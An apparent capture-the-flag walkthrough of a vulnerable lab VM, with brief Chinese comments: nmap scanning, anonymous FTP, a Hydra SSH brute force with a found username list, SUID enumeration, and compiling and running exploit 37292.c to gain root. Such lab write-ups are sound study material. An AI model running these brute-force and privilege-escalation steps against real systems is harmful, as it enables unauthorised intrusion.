┌──(root㉿kali)-[~] └─# nmap -Pn -A -sV -T4 -p- 192.168.3.28 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 04:55 EST Nmap scan report for 192.168.3.28 Host is up (0.00034s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.3.11 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeoutin seconds is 600 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.2 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable] 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA) | 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA) | 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA) |_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | http-robots.txt: 1 disallowed entry |_/secret MAC Address: 00:0C:29:39:E9:62 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.34 ms 192.168.3.28 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.44 seconds
┌──(root㉿kali)-[~] └─# ftp 192.168.3.28 Connected to 192.168.3.28. 220 (vsFTPd 3.0.2) Name (192.168.3.28:root): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 229 Entering Extended Passive Mode (|||33509|). 150 Here comes the directory listing. -rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap 226 Directory send OK. ftp> get lol.pcap local: lol.pcap remote: lol.pcap 229 Entering Extended Passive Mode (|||64258|). 150 Opening BINARY mode data connection for lol.pcap (8068 bytes). 100% |******************************************************************************************************************| 8068 8.89 MiB/s 00:00 ETA 226 Transfer complete. 8068 bytes received in 00:00 (4.98 MiB/s) ftp>
分析流量
请求下载了一个secret_stuff.txt
1
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
1 2 3
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow
Pass.txt
1
Good_job_:)
用户名+密码直接尝试海德拉爆破ssh了
1 2 3 4 5 6 7 8 9 10 11
┌──(root㉿kali)-[~/yiyi/tmp] └─# hydra -L user.txt -p Pass.txt ssh://192.168.3.28 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-06 05:18:49 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task [DATA] attacking ssh://192.168.3.28:22/ [22][ssh] host: 192.168.3.28 login: overflow password: Pass.txt 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-06 05:18:52
┌──(root㉿kali)-[~/yiyi/tmp] └─# ssh overflow@192.168.3.28 overflow@192.168.3.28's password: Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686) * Documentation: https://help.ubuntu.com/ New release '16.04.7 LTS' available. Run 'do-release-upgrade' to upgrade to it. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Nov 6 02:20:04 2024 from 192.168.3.11 Could not chdir to home directory /home/overflow: No such file or directory $ find / -perm -u=s -type f 2>/dev/null /usr/sbin/uuidd /usr/sbin/pppd /usr/bin/chfn /usr/bin/sudo /usr/bin/passwd /usr/bin/traceroute6.iputils /usr/bin/mtr /usr/bin/chsh /usr/bin/newgrp /usr/bin/gpasswd /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /bin/su /bin/ping /bin/fusermount /bin/ping6 /bin/mount /bin/umount $ uname -a Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux $
$ ls 37292.c $ gcc 37292.c -o exp $ ./exp spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # whoami root # ls /root proof.txt # cat /root/proof.txt Good job, you did it!
